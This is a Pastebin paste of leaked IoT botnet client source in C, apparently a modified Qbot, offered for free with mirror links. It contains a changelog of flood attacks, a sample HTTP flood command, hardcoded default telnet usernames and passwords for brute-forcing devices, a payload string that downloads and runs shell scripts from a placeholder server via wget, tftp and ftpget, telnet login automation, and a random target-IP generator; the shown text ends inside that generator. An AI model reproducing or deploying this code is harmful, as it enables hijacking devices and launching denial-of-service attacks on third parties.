Advertisement
Cumfort

LoveSecs Private Client ENJOY!

Aug 20th, 2017
1,240
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 70.56 KB | None | 0 0
  1. So um yeah this is leaked because like why not rofl gang gang type shit you could have payed $35 but here it is for free
  2. ENJOY?! heres a derect download link too https://www.mediafire.com/file/2l119234k68386q/loveclient.h (SAVE THE LINK IN CASE PASTEBIN TAKES THIS PASTE DOWN)
  3. Btw save it as loveclient.h its a .h i dont know why but it is so yea your welcome heres a ghost pin link too https://ghostbin.com/paste/6h968
  4.  
  5. /*
  6. {
  7. 6/23/17
  8. Cheats 2.5 Remasterd By Love Hecate (LEAKED LOL)
  9. 6/23/17
  10. }
  11. BUILD 2.5
  12. Qbot Modified by Jonah
  13. private void hackashit()
  14. {
  15. printf("Main Shit added\r\n");
  16. system("Look at The telnet scanner... Way better execution and faster");
  17. system("Working STD");//the std flood you see randomizing the strings that a few people have -say thanks to cheats for it
  18. system("Working HTTP Flood");
  19. system("Netis scanner added");//NEW!!!!!
  20. sleep(8);
  21. printf("lil shit added");
  22. system("Modified Botkill");
  23. system("Looping Payload Function");//PRETTY ASS
  24. system("Device Cleaner");
  25. system("New Get build");
  26. system("added python scanner lol");
  27. }
  28. //btw a lil side note the sh command is "MOVE"
  29. //another note ghp flood command is "!* HTTP cancer.org GET/POST/HEAD PORT PATH TIME POWER" SO LIKE THIS
  30. "!* HTTP cancer.org GET 80 / 60 200"
  31. //THE KILL ATTACK COMMAND IS "!* STOP"
  32. */
  33. #include <stdlib.h>
  34. #include <stdarg.h>
  35. #include <stdio.h>
  36. #include <sys/socket.h>
  37. #include <sys/types.h>
  38. #include <netinet/in.h>
  39. #include <arpa/inet.h>
  40. #include <netdb.h>
  41. #include <signal.h>
  42. #include <strings.h>
  43. #include <string.h>
  44. #include <sys/utsname.h>
  45. #include <unistd.h>
  46. #include <fcntl.h>
  47. #include <errno.h>
  48. #include <netinet/ip.h>
  49. #include <netinet/udp.h>
  50. #include <netinet/tcp.h>
  51. #include <sys/wait.h>
  52. #include <sys/ioctl.h>
  53. #include <net/if.h>
  54. #include <time.h>
  55. #include <limits.h>
  56. #define PR_SET_NAME 15
  57. #define SERVER_LIST_SIZE (sizeof(hekkertelnet) / sizeof(unsigned char *))
  58. #define PAD_RIGHT 1
  59. #define PAD_ZERO 2
  60. #define PRINT_BUF_LEN 12
  61. #define CMD_IAC 255
  62. #define CMD_WILL 251
  63. #define CMD_WONT 252
  64. #define CMD_DO 253
  65. #define CMD_DONT 254
  66. #define OPT_SGA 3
  67. #define STD2_SIZE 75
  68. #define BUFFER_SIZE 1024
  69. #define PHI 0x9e3779b9
  70. #define VERSION "DaddyV1.0"
  71. #define NETIS "AA\x00\x00AAAA"
  72. unsigned char *hekkertelnet[] = { "SERVERIP" };
  73. int Server_Botport = BOTPORT;
  74. char *usernames[] = {"666666\0", "support\0", "default\0", "root\0", "root\0", "admin\0", "root\0", "admin\0", "root\0", "admin\0", "admin\0", "root\0", "support\0", "root\0", "supervisor\0", "root\0", "root\0", "root\0"};
  75. char *passwords[] = {"666666\0", "support\0", "\0", "\0", "root\0", "admin\0", "1234\0", "root\0", "123456\0", "1234\0", "vnpt\0", "1234567890\0", "support\0", "antslq\0", "zyad1234\0", "anko\0", "tini\0", "letacla\0"};
  76. char *hvgsgd = "cd /tmp; wget http://SERVERIP/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp SERVERIP -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g SERVERIP; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 SERVERIP ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *\r\n";
  77. char* advances[] = {":", "ogin", "sername", "assword", (char*)0};//advances so if it says any of the following itll try a passwd or user
  78. char* fails[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", (char*)0};// ill kms if i see this
  79. char* successes[] = {"BusyBox", "$", "#", (char*)0};//if it sees this itll send the payload
  80. char* advances2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "BusyBox", "$", "#", (char*)0};
  81. int initConnection();
  82. int getBogos(unsigned char *bogomips);
  83. int getCores();
  84. int userID = 1;
  85. int getCountry(unsigned char *buf, int bufsize);
  86. void makeRandomStr(unsigned char *buf, int length);
  87. int HackerPrint(int sock, char *formatStr, ...);
  88. char *inet_ntoa(struct in_addr in);
  89. int D1ckSucka = 0, D1ckSuckaz = -1;
  90. uint32_t *pids;
  91. uint32_t scanPid;
  92. uint32_t ngPid;
  93. uint64_t numpids = 0;
  94. struct in_addr ourIP;
  95. unsigned char macAddress[6] = {0};
  96. static uint32_t Q[4096], c = 362436;
  97. void init_rand(uint32_t x)
  98. {
  99. int i;
  100. Q[0] = x;
  101. Q[1] = x + PHI;
  102. Q[2] = x + PHI + PHI;
  103. for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
  104. }
  105. uint32_t rand_cmwc(void)
  106. {
  107. uint64_t t, a = 18782LL;
  108. static uint32_t i = 4095;
  109. uint32_t x, r = 0xfffffffe;
  110. i = (i + 1) & 4095;
  111. t = a * Q[i] + c;
  112. c = (uint32_t)(t >> 32);
  113. x = t + c;
  114. if (x < c) {
  115. x++;
  116. c++;
  117. }
  118. return (Q[i] = r - x);
  119. }
  120. void trim(char *str)
  121. {
  122. int i;
  123. int begin = 0;
  124. int end = strlen(str) - 1;
  125. while (isspace(str[begin])) begin++;
  126. while ((end >= begin) && isspace(str[end])) end--;
  127. for (i = begin; i <= end; i++) str[i - begin] = str[i];
  128. str[i - begin] = '\0';
  129. }
  130. static void printchar(unsigned char **str, int c)
  131. {
  132. if (str) {
  133. **str = c;
  134. ++(*str);
  135. }
  136. else (void)write(1, &c, 1);
  137. }
  138. static int prints(unsigned char **out, const unsigned char *string, int width, int pad)
  139. {
  140. register int pc = 0, padchar = ' ';
  141. if (width > 0) {
  142. register int len = 0;
  143. register const unsigned char *ptr;
  144. for (ptr = string; *ptr; ++ptr) ++len;
  145. if (len >= width) width = 0;
  146. else width -= len;
  147. if (pad & PAD_ZERO) padchar = '0';
  148. }
  149. if (!(pad & PAD_RIGHT)) {
  150. for ( ; width > 0; --width) {
  151. printchar (out, padchar);
  152. ++pc;
  153. }
  154. }
  155. for ( ; *string ; ++string) {
  156. printchar (out, *string);
  157. ++pc;
  158. }
  159. for ( ; width > 0; --width) {
  160. printchar (out, padchar);
  161. ++pc;
  162. }
  163. return pc;
  164. }
  165. static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase)
  166. {
  167. unsigned char print_buf[PRINT_BUF_LEN];
  168. register unsigned char *s;
  169. register int t, neg = 0, pc = 0;
  170. register unsigned int u = i;
  171. if (i == 0) {
  172. print_buf[0] = '0';
  173. print_buf[1] = '\0';
  174. return prints (out, print_buf, width, pad);
  175. }
  176. if (sg && b == 10 && i < 0) {
  177. neg = 1;
  178. u = -i;
  179. }
  180. s = print_buf + PRINT_BUF_LEN-1;
  181. *s = '\0';
  182. while (u) {
  183. t = u % b;
  184. if( t >= 10 )
  185. t += letbase - '0' - 10;
  186. *--s = t + '0';
  187. u /= b;
  188. }
  189. if (neg) {
  190. if( width && (pad & PAD_ZERO) ) {
  191. printchar (out, '-');
  192. ++pc;
  193. --width;
  194. }
  195. else {
  196. *--s = '-';
  197. }
  198. }
  199. return pc + prints (out, s, width, pad);
  200. }
  201. static int print(unsigned char **out, const unsigned char *format, va_list args )
  202. {
  203. register int width, pad;
  204. register int pc = 0;
  205. unsigned char scr[2];
  206. for (; *format != 0; ++format) {
  207. if (*format == '%') {
  208. ++format;
  209. width = pad = 0;
  210. if (*format == '\0') break;
  211. if (*format == '%') goto out;
  212. if (*format == '-') {
  213. ++format;
  214. pad = PAD_RIGHT;
  215. }
  216. while (*format == '0') {
  217. ++format;
  218. pad |= PAD_ZERO;
  219. }
  220. for ( ; *format >= '0' && *format <= '9'; ++format) {
  221. width *= 10;
  222. width += *format - '0';
  223. }
  224. if( *format == 's' ) {
  225. register char *s = (char *)va_arg( args, int );
  226. pc += prints (out, s?s:"(null)", width, pad);
  227. continue;
  228. }
  229. if( *format == 'd' ) {
  230. pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
  231. continue;
  232. }
  233. if( *format == 'x' ) {
  234. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
  235. continue;
  236. }
  237. if( *format == 'X' ) {
  238. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
  239. continue;
  240. }
  241. if( *format == 'u' ) {
  242. pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
  243. continue;
  244. }
  245. if( *format == 'c' ) {
  246. scr[0] = (unsigned char)va_arg( args, int );
  247. scr[1] = '\0';
  248. pc += prints (out, scr, width, pad);
  249. continue;
  250. }
  251. }
  252. else {
  253. out:
  254. printchar (out, *format);
  255. ++pc;
  256. }
  257. }
  258. if (out) **out = '\0';
  259. va_end( args );
  260. return pc;
  261. }
  262. int zprintf(const unsigned char *format, ...)
  263. {
  264. va_list args;
  265. va_start( args, format );
  266. return print( 0, format, args );
  267. }
  268. int szprintf(unsigned char *out, const unsigned char *format, ...)
  269. {
  270. va_list args;
  271. va_start( args, format );
  272. return print( &out, format, args );
  273. }
  274. int HackerPrint(int sock, char *formatStr, ...)
  275. {
  276. unsigned char *textBuffer = malloc(2048);
  277. memset(textBuffer, 0, 2048);
  278. char *orig = textBuffer;
  279. va_list args;
  280. va_start(args, formatStr);
  281. print(&textBuffer, formatStr, args);
  282. va_end(args);
  283. orig[strlen(orig)] = '\n';
  284. //zprintf("buf: %s\n", orig);
  285. int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);
  286. free(orig);
  287. return q;
  288. }
  289. static int *fdopen_pids;
  290. int fdpopen(unsigned char *program, register unsigned char *type)
  291. {
  292. register int iop;
  293. int pdes[2], fds, pid;
  294. if (*type != 'r' && *type != 'w' || type[1]) return -1;
  295. if (pipe(pdes) < 0) return -1;
  296. if (fdopen_pids == NULL) {
  297. if ((fds = getdtablesize()) <= 0) return -1;
  298. if ((fdopen_pids = (int *)malloc((unsigned int)(fds * sizeof(int)))) == NULL) return -1;
  299. memset((unsigned char *)fdopen_pids, 0, fds * sizeof(int));
  300. }
  301. switch (pid = vfork())
  302. {
  303. case -1:
  304. close(pdes[0]);
  305. close(pdes[1]);
  306. return -1;
  307. case 0:
  308. if (*type == 'r') {
  309. if (pdes[1] != 1) {
  310. dup2(pdes[1], 1);
  311. close(pdes[1]);
  312. }
  313. close(pdes[0]);
  314. } else {
  315. if (pdes[0] != 0) {
  316. (void) dup2(pdes[0], 0);
  317. (void) close(pdes[0]);
  318. }
  319. (void) close(pdes[1]);
  320. }
  321. execl("/bin/sh", "sh", "-c", program, NULL);
  322. _exit(127);
  323. }
  324. if (*type == 'r') {
  325. iop = pdes[0];
  326. (void) close(pdes[1]);
  327. } else {
  328. iop = pdes[1];
  329. (void) close(pdes[0]);
  330. }
  331. fdopen_pids[iop] = pid;
  332. return (iop);
  333. }
  334. int fdpclose(int iop)
  335. {
  336. register int fdes;
  337. sigset_t omask, nmask;
  338. int pstat;
  339. register int pid;
  340. if (fdopen_pids == NULL || fdopen_pids[iop] == 0) return (-1);
  341. (void) close(iop);
  342. sigemptyset(&nmask);
  343. sigaddset(&nmask, SIGINT);
  344. sigaddset(&nmask, SIGQUIT);
  345. sigaddset(&nmask, SIGHUP);
  346. (void) sigprocmask(SIG_BLOCK, &nmask, &omask);
  347. do {
  348. pid = waitpid(fdopen_pids[iop], (int *) &pstat, 0);
  349. } while (pid == -1 && errno == EINTR);
  350. (void) sigprocmask(SIG_SETMASK, &omask, NULL);
  351. fdopen_pids[fdes] = 0;
  352. return (pid == -1 ? -1 : WEXITSTATUS(pstat));
  353. }
  354. unsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd)
  355. {
  356. int got = 1, total = 0;
  357. while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
  358. return got == 0 ? NULL : buffer;
  359. }
  360. static const long hextable[] = {
  361. [0 ... 255] = -1,
  362. ['0'] = 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
  363. ['A'] = 10, 11, 12, 13, 14, 15,
  364. ['a'] = 10, 11, 12, 13, 14, 15
  365. };
  366. long parseHex(unsigned char *hex)
  367. {
  368. long ret = 0;
  369. while (*hex && ret >= 0) ret = (ret << 4) | hextable[*hex++];
  370. return ret;
  371. }
  372. int wildString(const unsigned char* pattern, const unsigned char* string) {
  373. switch(*pattern)
  374. {
  375. case '\0': return *string;
  376. case '*': return !(!wildString(pattern+1, string) || *string && !wildString(pattern, string+1));
  377. case '?': return !(*string && !wildString(pattern+1, string+1));
  378. default: return !((toupper(*pattern) == toupper(*string)) && !wildString(pattern+1, string+1));
  379. }
  380. }
  381. int getHost(unsigned char *toGet, struct in_addr *i)
  382. {
  383. struct hostent *h;
  384. if((i->s_addr = inet_addr(toGet)) == -1) return 1;
  385. return 0;
  386. }
  387. void uppercase(unsigned char *str)
  388. {
  389. while(*str) { *str = toupper(*str); str++; }
  390. }
  391. int getBogos(unsigned char *bogomips)
  392. {
  393. int cmdline = open("/proc/cpuinfo", O_RDONLY);
  394. char linebuf[4096];
  395. while(fdgets(linebuf, 4096, cmdline) != NULL)
  396. {
  397. uppercase(linebuf);
  398. if(strstr(linebuf, "BOGOMIPS") == linebuf)
  399. {
  400. unsigned char *pos = linebuf + 8;
  401. while(*pos == ' ' || *pos == '\t' || *pos == ':') pos++;
  402. while(pos[strlen(pos)-1] == '\r' || pos[strlen(pos)-1] == '\n') pos[strlen(pos)-1]=0;
  403. if(strchr(pos, '.') != NULL) *strchr(pos, '.') = 0x00;
  404. strcpy(bogomips, pos);
  405. close(cmdline);
  406. return 0;
  407. }
  408. memset(linebuf, 0, 4096);
  409. }
  410. close(cmdline);
  411. return 1;
  412. }
  413. int getCores()
  414. {
  415. int totalcores = 0;
  416. int cmdline = open("/proc/cpuinfo", O_RDONLY);
  417. char linebuf[4096];
  418. while(fdgets(linebuf, 4096, cmdline) != NULL)
  419. {
  420. uppercase(linebuf);
  421. if(strstr(linebuf, "BOGOMIPS") == linebuf) totalcores++;
  422. memset(linebuf, 0, 4096);
  423. }
  424. close(cmdline);
  425. return totalcores;
  426. }
  427. void makeRandomStr(unsigned char *buf, int length)
  428. {
  429. int i = 0;
  430. for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
  431. }
  432. int recvLine(int socket, unsigned char *buf, int bufsize)
  433. {
  434. memset(buf, 0, bufsize);
  435. fd_set myset;
  436. struct timeval tv;
  437. tv.tv_sec = 30;
  438. tv.tv_usec = 0;
  439. FD_ZERO(&myset);
  440. FD_SET(socket, &myset);
  441. int selectRtn, retryCount;
  442. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
  443. while(retryCount < 10)
  444. {
  445. HackerPrint(D1ckSucka, "PING");
  446. tv.tv_sec = 30;
  447. tv.tv_usec = 0;
  448. FD_ZERO(&myset);
  449. FD_SET(socket, &myset);
  450. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
  451. retryCount++;
  452. continue;
  453. }
  454. break;
  455. }
  456. }
  457. unsigned char tmpchr;
  458. unsigned char *cp;
  459. int count = 0;
  460. cp = buf;
  461. while(bufsize-- > 1)
  462. {
  463. if(recv(D1ckSucka, &tmpchr, 1, 0) != 1) {
  464. *cp = 0x00;
  465. return -1;
  466. }
  467. *cp++ = tmpchr;
  468. if(tmpchr == '\n') break;
  469. count++;
  470. }
  471. *cp = 0x00;
  472. // zprintf("recv: %s\n", cp);
  473. return count;
  474. }
  475. int hostname_to_ip(char * hostname , char* ip)
  476. {
  477. struct hostent *he;
  478. struct in_addr **addr_list;
  479. int i;
  480. if ( (he = gethostbyname( hostname ) ) == NULL)
  481. {
  482. // get the host info
  483. herror("gethostbyname");
  484. return 1;
  485. }
  486. addr_list = (struct in_addr **) he->h_addr_list;
  487. for(i = 0; addr_list[i] != NULL; i++)
  488. {
  489. //Return the first one;
  490. strcpy(ip , inet_ntoa(*addr_list[i]) );
  491. return 0;
  492. }
  493. return 1;
  494. }
  495. int connectTimeout(int fd, char *host, int port, int timeout)
  496. {
  497. struct sockaddr_in dest_addr;
  498. fd_set myset;
  499. struct timeval tv;
  500. socklen_t lon;
  501. int valopt;
  502. long arg = fcntl(fd, F_GETFL, NULL);
  503. arg |= O_NONBLOCK;
  504. fcntl(fd, F_SETFL, arg);
  505. dest_addr.sin_family = AF_INET;
  506. dest_addr.sin_port = htons(port);
  507. if(getHost(host, &dest_addr.sin_addr)) return 0;
  508. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  509. int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  510. if (res < 0) {
  511. if (errno == EINPROGRESS) {
  512. tv.tv_sec = timeout;
  513. tv.tv_usec = 0;
  514. FD_ZERO(&myset);
  515. FD_SET(fd, &myset);
  516. if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {
  517. lon = sizeof(int);
  518. getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  519. if (valopt) return 0;
  520. }
  521. else return 0;
  522. }
  523. else return 0;
  524. }
  525. arg = fcntl(fd, F_GETFL, NULL);
  526. arg &= (~O_NONBLOCK);
  527. fcntl(fd, F_SETFL, arg);
  528. return 1;
  529. }
  530. int listFork()
  531. {
  532. uint32_t parent, *newpids, i;
  533. parent = fork();
  534. if (parent <= 0) return parent;
  535. numpids++;
  536. newpids = (uint32_t*)malloc((numpids + 1) * 4);
  537. for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
  538. newpids[numpids - 1] = parent;
  539. free(pids);
  540. pids = newpids;
  541. return parent;
  542. }
  543. int negotiate(int sock, unsigned char *buf, int len)
  544. {
  545. unsigned char c;
  546. switch (buf[1]) {
  547. case CMD_IAC: /*dropped an extra 0xFF wh00ps*/ return 0;
  548. case CMD_WILL:
  549. case CMD_WONT:
  550. case CMD_DO:
  551. case CMD_DONT:
  552. c = CMD_IAC;
  553. send(sock, &c, 1, MSG_NOSIGNAL);
  554. if (CMD_WONT == buf[1]) c = CMD_DONT;
  555. else if (CMD_DONT == buf[1]) c = CMD_WONT;
  556. else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
  557. else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
  558. send(sock, &c, 1, MSG_NOSIGNAL);
  559. send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
  560. break;
  561. default:
  562. break;
  563. }
  564. return 0;
  565. }
  566. int matchPrompt(char *bufStr)
  567. {
  568. char *prompts = ":>%$#\0";
  569. int bufLen = strlen(bufStr);
  570. int i, q = 0;
  571. for(i = 0; i < strlen(prompts); i++)
  572. {
  573. while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
  574. if(*(bufStr + bufLen - q) == prompts[i]) return 1;
  575. }
  576. return 0;
  577. }
  578. int readUntil(int fd, char *toFind, int matchLePrompt, int timeout, int timeoutusec, char *buffer, int bufSize, int initialIndex)
  579. {
  580. int bufferUsed = initialIndex, got = 0, found = 0;
  581. fd_set myset;
  582. struct timeval tv;
  583. tv.tv_sec = timeout;
  584. tv.tv_usec = timeoutusec;
  585. unsigned char *initialRead = NULL;
  586. while(bufferUsed + 2 < bufSize && (tv.tv_sec > 0 || tv.tv_usec > 0))
  587. {
  588. FD_ZERO(&myset);
  589. FD_SET(fd, &myset);
  590. if (select(fd+1, &myset, NULL, NULL, &tv) < 1) break;
  591. initialRead = buffer + bufferUsed;
  592. got = recv(fd, initialRead, 1, 0);
  593. if(got == -1 || got == 0) return 0;
  594. bufferUsed += got;
  595. if(*initialRead == 0xFF)
  596. {
  597. got = recv(fd, initialRead + 1, 2, 0);
  598. if(got == -1 || got == 0) return 0;
  599. bufferUsed += got;
  600. if(!negotiate(fd, initialRead, 3)) return 0;
  601. } else {
  602. if(strstr(buffer, toFind) != NULL || (matchLePrompt && matchPrompt(buffer))) { found = 1; break; }
  603. }
  604. }
  605. if(found) return 1;
  606. return 0;
  607. }
  608. static uint8_t ipState[5] = {0};
  609. in_addr_t HackerScan2()
  610. {
  611. ipState[1] = 0;
  612. ipState[2] = 0;
  613. ipState[3] = 0;
  614. ipState[4] = 0;
  615. ipState[1] = rand() % 255;
  616. ipState[2] = rand() % 255;
  617. ipState[3] = rand() % 255;
  618. ipState[4] = rand() % 255;
  619. int randnum = rand() % 208;
  620. char ip[16];
  621. if(randnum == 0)
  622. {
  623. szprintf(ip, "112.5.%d.%d", ipState[3], ipState[4]);
  624. }
  625. if(randnum == 1)
  626. {
  627. szprintf(ip, "117.165.%d.%d", ipState[3], ipState[4]);
  628. }
  629. if(randnum == 2)
  630. {
  631. szprintf(ip, "85.3.%d.%d", ipState[3], ipState[4]);
  632. }
  633. if(randnum == 3)
  634. {
  635. szprintf(ip, "37.158.%d.%d", ipState[3], ipState[4]);
  636. }
  637. if(randnum == 4)
  638. {
  639. szprintf(ip, "95.9.%d.%d", ipState[3], ipState[4]);
  640. }
  641. if(randnum == 5)
  642. {
  643. szprintf(ip, "41.252.%d.%d", ipState[3], ipState[4]);
  644. }
  645. if(randnum == 6)
  646. {
  647. szprintf(ip, "58.71.%d.%d", ipState[3], ipState[4]);
  648. }
  649. if(randnum == 7)
  650. {
  651. szprintf(ip, "104.55.%d.%d", ipState[3], ipState[4]);
  652. }
  653. if(randnum == 8)
  654. {
  655. szprintf(ip, "78.186.%d.%d", ipState[3], ipState[4]);
  656. }
  657. if(randnum == 9)
  658. {
  659. szprintf(ip, "78.189.%d.%d", ipState[3], ipState[4]);
  660. }
  661. if(randnum == 10)
  662. {
  663. szprintf(ip, "221.120.%d.%d", ipState[3], ipState[4]);
  664. }
  665. if(randnum == 11)
  666. {
  667. szprintf(ip, "88.5.%d.%d", ipState[3], ipState[4]);
  668. }
  669. if(randnum == 12)
  670. {
  671. szprintf(ip, "41.254.%d.%d", ipState[3], ipState[4]);
  672. }
  673. if(randnum == 13)
  674. {
  675. szprintf(ip, "103.20.%d.%d", ipState[3], ipState[4]);
  676. }
  677. if(randnum == 14)
  678. {
  679. szprintf(ip, "103.47.%d.%d", ipState[3], ipState[4]);
  680. }
  681. if(randnum == 15)
  682. {
  683. szprintf(ip, "103.57.%d.%d", ipState[3], ipState[4]);
  684. }
  685. if(randnum == 16)
  686. {
  687. szprintf(ip, "45.117.%d.%d", ipState[3], ipState[4]);
  688. }
  689. if(randnum == 17)
  690. {
  691. szprintf(ip, "101.51.%d.%d", ipState[3], ipState[4]);
  692. }
  693. if(randnum == 18)
  694. {
  695. szprintf(ip, "137.59.%d.%d", ipState[3], ipState[4]);
  696. }
  697. if(randnum == 19)
  698. {
  699. szprintf(ip, "1.56.%d.%d", ipState[3], ipState[4]);
  700. }
  701. if(randnum == 20)
  702. {
  703. szprintf(ip, "1.188.%d.%d", ipState[3], ipState[4]);
  704. }
  705. if(randnum == 21)
  706. {
  707. szprintf(ip, "14.204.%d.%d", ipState[3], ipState[4]);
  708. }
  709. if(randnum == 22)
  710. {
  711. szprintf(ip, "27.0.%d.%d", ipState[3], ipState[4]);
  712. }
  713. if(randnum == 23)
  714. {
  715. szprintf(ip, "27.8.%d.%d", ipState[3], ipState[4]);
  716. }
  717. if(randnum == 24)
  718. {
  719. szprintf(ip, "27.50.%d.%d", ipState[3], ipState[4]);
  720. }
  721. if(randnum == 25)
  722. {
  723. szprintf(ip, "27.54.%d.%d", ipState[3], ipState[4]);
  724. }
  725. if(randnum == 26)
  726. {
  727. szprintf(ip, "27.98.%d.%d", ipState[3], ipState[4]);
  728. }
  729. if(randnum == 27)
  730. {
  731. szprintf(ip, "27.112.%d.%d", ipState[3], ipState[4]);
  732. }
  733. if(randnum == 28)
  734. {
  735. szprintf(ip, "27.192.%d.%d", ipState[3], ipState[4]);
  736. }
  737. if(randnum == 29)
  738. {
  739. szprintf(ip, "36.32.%d.%d", ipState[3], ipState[4]);
  740. }
  741. if(randnum == 30)
  742. {
  743. szprintf(ip, "36.248.%d.%d", ipState[3], ipState[4]);
  744. }
  745. if(randnum == 31)
  746. {
  747. szprintf(ip, "39.64.%d.%d", ipState[3], ipState[4]);
  748. }
  749. if(randnum == 32)
  750. {
  751. szprintf(ip, "42.4.%d.%d", ipState[3], ipState[4]);
  752. }
  753. if(randnum == 33)
  754. {
  755. szprintf(ip, "42.48.%d.%d", ipState[3], ipState[4]);
  756. }
  757. if(randnum == 34)
  758. {
  759. szprintf(ip, "42.52.%d.%d", ipState[3], ipState[4]);
  760. }
  761. if(randnum == 35)
  762. {
  763. szprintf(ip, "42.56.%d.%d", ipState[3], ipState[4]);
  764. }
  765. if(randnum == 36)
  766. {
  767. szprintf(ip, "42.63.%d.%d", ipState[3], ipState[4]);
  768. }
  769. if(randnum == 37)
  770. {
  771. szprintf(ip, "42.84.%d.%d", ipState[3], ipState[4]);
  772. }
  773. if(randnum == 38)
  774. {
  775. szprintf(ip, "42.176.%d.%d", ipState[3], ipState[4]);
  776. }
  777. if(randnum == 39)
  778. {
  779. szprintf(ip, "42.224.%d.%d", ipState[3], ipState[4]);
  780. }
  781. if(randnum == 40)
  782. {
  783. szprintf(ip, "42.176.%d.%d", ipState[3], ipState[4]);
  784. }
  785. if(randnum == 41)
  786. {
  787. szprintf(ip, "43.253.%d.%d", ipState[3], ipState[4]);
  788. }
  789. if(randnum == 42)
  790. {
  791. szprintf(ip, "43.230.%d.%d", ipState[3], ipState[4]);
  792. }
  793. if(randnum == 43)
  794. {
  795. szprintf(ip, "163.53.%d.%d", ipState[3], ipState[4]);
  796. }
  797. if(randnum == 44)
  798. {
  799. szprintf(ip, "43.230.%d.%d", ipState[3], ipState[4]);
  800. }
  801. if(randnum == 45)
  802. {
  803. szprintf(ip, "62.252.%d.%d", ipState[3], ipState[4]);
  804. }
  805. if(randnum == 46)
  806. {
  807. szprintf(ip, "43.245.%d.%d", ipState[3], ipState[4]);
  808. }
  809. if(randnum == 47)
  810. {
  811. szprintf(ip, "62.255.%d.%d", ipState[3], ipState[4]);
  812. }
  813. if(randnum == 48)
  814. {
  815. szprintf(ip, "123.25.%d.%d", ipState[3], ipState[4]);
  816. }
  817. if(randnum == 49)
  818. {
  819. szprintf(ip, "103.54.%d.%d", ipState[3], ipState[4]);
  820. }
  821. if(randnum == 50)
  822. {
  823. szprintf(ip, "27.255.%d.%d", ipState[3], ipState[4]);
  824. }
  825. if(randnum == 51)
  826. {
  827. szprintf(ip, "103.204.%d.%d", ipState[3], ipState[4]);
  828. }
  829. if(randnum == 52)
  830. {
  831. szprintf(ip, "123.24.%d.%d", ipState[3], ipState[4]);
  832. }
  833. if(randnum ==53)
  834. {
  835. szprintf(ip, "113.191.%d.%d", ipState[3], ipState[4]);
  836. }
  837. if(randnum == 54)
  838. {
  839. szprintf(ip, "81.100.%d.%d", ipState[3], ipState[4]);
  840. }
  841. if(randnum == 55)
  842. {
  843. szprintf(ip, "113.188.%d.%d", ipState[3], ipState[4]);
  844. }
  845. if(randnum == 56)
  846. {
  847. szprintf(ip, "113.189.%d.%d", ipState[3], ipState[4]);
  848. }
  849. if(randnum == 57)
  850. {
  851. szprintf(ip, "94.174.%d.%d", ipState[3], ipState[4]);
  852. }
  853. if(randnum == 58)
  854. {
  855. szprintf(ip, "14.160.%d.%d", ipState[3], ipState[4]);
  856. }
  857. if(randnum == 59)
  858. {
  859. szprintf(ip, "14.161.%d.%d", ipState[3], ipState[4]);
  860. }
  861. if(randnum == 60)
  862. {
  863. szprintf(ip, "14.162.%d.%d", ipState[3], ipState[4]);
  864. }
  865. if(randnum == 61)
  866. {
  867. szprintf(ip, "14.163.%d.%d", ipState[3], ipState[4]);
  868. }
  869. if(randnum == 62)
  870. {
  871. szprintf(ip, "14.164.%d.%d", ipState[3], ipState[4]);
  872. }
  873. if(randnum == 63)
  874. {
  875. szprintf(ip, "14.165.%d.%d", ipState[3], ipState[4]);
  876. }
  877. if(randnum == 64)
  878. {
  879. szprintf(ip, "14.166.%d.%d", ipState[3], ipState[4]);
  880. }
  881. if(randnum == 65)
  882. {
  883. szprintf(ip, "14.167.%d.%d", ipState[3], ipState[4]);
  884. }
  885. if(randnum == 66)
  886. {
  887. szprintf(ip, "14.168.%d.%d", ipState[3], ipState[4]);
  888. }
  889. if(randnum == 67)
  890. {
  891. szprintf(ip, "14.169.%d.%d", ipState[3], ipState[4]);
  892. }
  893. if(randnum == 68)
  894. {
  895. szprintf(ip, "14.170.%d.%d", ipState[3], ipState[4]);
  896. }
  897. if(randnum == 69)
  898. {
  899. szprintf(ip, "14.171.%d.%d", ipState[3], ipState[4]);
  900. }
  901. if(randnum == 70)
  902. {
  903. szprintf(ip, "14.172.%d.%d", ipState[3], ipState[4]);
  904. }
  905. if(randnum == 71)
  906. {
  907. szprintf(ip, "14.173.%d.%d", ipState[3], ipState[4]);
  908. }
  909. if(randnum == 72)
  910. {
  911. szprintf(ip, "14.174.%d.%d", ipState[3], ipState[4]);
  912. }
  913. if(randnum == 73)
  914. {
  915. szprintf(ip, "14.175.%d.%d", ipState[3], ipState[4]);
  916. }
  917. if(randnum == 74)
  918. {
  919. szprintf(ip, "14.176.%d.%d", ipState[3], ipState[4]);
